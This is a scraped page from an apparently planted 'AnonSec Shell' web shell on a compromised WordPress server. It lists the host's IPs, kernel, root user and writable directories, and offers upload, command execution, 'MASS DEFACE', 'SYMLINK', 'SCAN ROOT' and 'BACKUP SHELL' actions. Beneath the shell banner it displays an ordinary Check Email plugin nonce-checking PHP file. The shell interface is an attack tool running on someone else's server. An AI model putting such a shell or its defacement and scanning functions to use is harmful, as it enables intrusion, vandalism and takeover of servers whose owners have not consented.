AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 18.220.197.67   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/check-email/include/Core/Request/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/check-email/include/Core/Request/Check_Email_Nonce_Checker.php
<?php namespace CheckEmail\Core\Request;

use CheckEmail\Core\Loadie;
use CheckEmail\Core\UI\Page\Check_Email_Log_List_Page;

defined( 'ABSPATH' ) || exit; // Exit if accessed directly.

/**
 * Check nonce for all Check Email Log requests.
 */
class Check_Email_Nonce_Checker implements Loadie {

	public function load() {
		add_action( 'admin_init', array( $this, 'check_nonce' ) );
	}

	public function check_nonce() {
		if ( ! current_user_can('manage_options') ) {
      		return false;
    	}
		
		if ( ! isset( $_POST['check-email-action'] ) && ! isset( $_REQUEST['action'] ) && ! isset( $_REQUEST['action2'] ) ) {
			return;
		}

		if ( isset( $_POST['check-email-action'] ) ) {
			$action = sanitize_text_field( wp_unslash( $_POST['check-email-action'] ) );

			// $action is sanitize on line 23
			// phpcs:ignore
			if ( ! isset( $_POST[ $action . '_nonce' ] ) ) {
				return;
			}

			// $action is sanitize on line 23
			// phpcs:ignore
			if ( ! wp_verify_nonce( $_POST[ $action . '_nonce' ], $action ) ) {
				return;
			}
		}

		if ( isset( $_REQUEST['action'] ) || isset( $_REQUEST['action2'] ) ) {
			$action = sanitize_text_field( wp_unslash($_REQUEST['action']) );

			if ( '-1' === $action ) {
				if ( ! isset( $_REQUEST['action2'] ) ) {
					return;
				}

				$action = sanitize_text_field( wp_unslash($_REQUEST['action2']) );
			}

			$is_right_page = false;

			// $action is sanitize on line 39 or 46
			// phpcs:ignore
			if ( strpos( $action, 'check-email-log-list-' ) === 0  ) {
				$is_right_page = true;
			}
			if ( strpos( $action, 'check-email-error-tracker-' ) === 0  ) {
				$is_right_page = true;
			}

			if (!$is_right_page) {
				return;
			}

			if ( ! isset( $_REQUEST[ Check_Email_Log_List_Page::LOG_LIST_ACTION_NONCE_FIELD ] ) ) {
				return;
			}
			
			// phpcs:ignore
			if ( ! wp_verify_nonce( $_REQUEST[ Check_Email_Log_List_Page::LOG_LIST_ACTION_NONCE_FIELD ], Check_Email_Log_List_Page::LOG_LIST_ACTION_NONCE ) ) {
				return;
			}
		}

		do_action( 'check_email_action', $action, $_REQUEST );
		do_action( $action, $_REQUEST );
	}
}

Anon7 - 2022
AnonSec Team